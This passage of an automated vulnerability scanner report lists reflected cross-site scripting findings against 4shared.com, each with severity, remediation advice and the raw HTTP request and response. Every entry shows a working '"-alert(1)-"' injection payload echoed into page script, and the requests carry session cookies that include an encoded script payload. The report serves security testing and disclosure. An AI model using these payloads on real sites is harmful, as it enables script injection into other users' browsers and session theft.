Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /oauth/startFacebookLogin.jsp4481d&quot;-alert(1)-&quot;c7de45f4dcb
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=621C418861194619D182939BF9069DC2.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:50 GMT
Connection: close
Content-Length: 36203


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/oauth/startFacebookLogin.jsp4481d"-alert(1)-"c7de45f4dcb";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.49. http://www.4shared.com/premium.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /premium.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb2ec"-alert(1)-"e169cb5f37d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /premium.jspcb2ec"-alert(1)-"e169cb5f37d HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /premium.jspcb2ec&quot;-alert(1)-&quot;e169cb5f37d
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1A92818CFB6F551716E7018166B205B6.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:00 GMT
Connection: close
Content-Length: 36118


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/premium.jspcb2ec"-alert(1)-"e169cb5f37d";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.50. http://www.4shared.com/press_room/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /press_room/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94440"-alert(1)-"30c8fdbfe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /press_room94440"-alert(1)-"30c8fdbfe4/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /press_room94440&quot;-alert(1)-&quot;30c8fdbfe4/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5D48B010F53E401E07A710D3F1BC1A7B.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:13 GMT
Connection: close
Content-Length: 36102


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/press_room94440"-alert(1)-"30c8fdbfe4/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

5.51. http://www.4shared.com/privacy.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /privacy.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35670"-alert(1)-"3015378b77f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy.jsp35670"-alert(1)-"3015378b77f HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /privacy.jsp35670&quot;-alert(1)-&quot;3015378b77f
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9CA83E4A7CCCE2745DB3EEC1AE1A1846.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:42 GMT
Connection: close
Content-Length: 36107


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/privacy.jsp35670"-alert(1)-"3015378b77f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.52. http://www.4shared.com/q/BAQD/1/books_office [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BAQD/1/books_office

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f84fe"-alert(1)-"086eb606b7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /f84fe"-alert(1)-"086eb606b7a/BAQD/1/books_office HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /f84fe&quot;-alert(1)-&quot;086eb606b7a/BAQD/1/books_office
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=28AE5917D14DA5B988790134206A2EC8.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:49 GMT
Connection: close
Content-Length: 36152


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/f84fe"-alert(1)-"086eb606b7a/BAQD/1/books_office";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

5.53. http://www.4shared.com/q/BAQD/1/music [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BAQD/1/music

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8ddd"-alert(1)-"4eb60d1a81f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /d8ddd"-alert(1)-"4eb60d1a81f/BAQD/1/music HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /d8ddd&quot;-alert(1)-&quot;4eb60d1a81f/BAQD/1/music
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1FB68892A373E29C54E58DFCA3C6C717.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:45 GMT
Connection: close
Content-Length: 36128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/d8ddd"-alert(1)-"4eb60d1a81f/BAQD/1/music";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.54. http://www.4shared.com/q/BAQD/1/photo [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BAQD/1/photo

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd1ba"-alert(1)-"41986b68520 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cd1ba"-alert(1)-"41986b68520/BAQD/1/photo HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /cd1ba&quot;-alert(1)-&quot;41986b68520/BAQD/1/photo
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=67639F9FC77CA94F11137417A85EE2B9.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:46 GMT
Connection: close
Content-Length: 36128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/cd1ba"-alert(1)-"41986b68520/BAQD/1/photo";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.55. http://www.4shared.com/q/BAQD/1/video [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BAQD/1/video

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 858cf"-alert(1)-"bdd77823b47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /858cf"-alert(1)-"bdd77823b47/BAQD/1/video HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /858cf&quot;-alert(1)-&quot;bdd77823b47/BAQD/1/video
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3C640796F120D13D434DE54103841592.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:45 GMT
Connection: close
Content-Length: 36128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/858cf"-alert(1)-"bdd77823b47/BAQD/1/video";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.56. http://www.4shared.com/q/BBQD/1/books_office [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BBQD/1/books_office

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd152"-alert(1)-"2424e2b2550 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fd152"-alert(1)-"2424e2b2550/BBQD/1/books_office HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /fd152&quot;-alert(1)-&quot;2424e2b2550/BBQD/1/books_office
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BC530E46FC3B2E00AA7E9B1A9CBE82FE.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:01 GMT
Connection: close
Content-Length: 36152


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/fd152"-alert(1)-"2424e2b2550/BBQD/1/books_office";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

5.57. http://www.4shared.com/q/BBQD/1/music [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BBQD/1/music

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0d14"-alert(1)-"821bdd307fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /d0d14"-alert(1)-"821bdd307fa/BBQD/1/music HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /d0d14&quot;-alert(1)-&quot;821bdd307fa/BBQD/1/music
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BBA5D99DE20ED5B76ABAEA41857ABC88.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:50 GMT
Connection: close
Content-Length: 36128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/d0d14"-alert(1)-"821bdd307fa/BBQD/1/music";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.58. http://www.4shared.com/q/BBQD/1/photo [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BBQD/1/photo

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6737"-alert(1)-"b10306e2af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c6737"-alert(1)-"b10306e2af/BBQD/1/photo HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /c6737&quot;-alert(1)-&quot;b10306e2af/BBQD/1/photo
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=46767249EFBF094A5A5310B7A919D858.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:58 GMT
Connection: close
Content-Length: 36123


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/c6737"-alert(1)-"b10306e2af/BBQD/1/photo";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.59. http://www.4shared.com/q/BBQD/1/video [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BBQD/1/video

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82467"-alert(1)-"f15a819900 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /82467"-alert(1)-"f15a819900/BBQD/1/video HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /82467&quot;-alert(1)-&quot;f15a819900/BBQD/1/video
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E3054CC4BE274D5119832B17CA3C7098.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:50 GMT
Connection: close
Content-Length: 36123


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
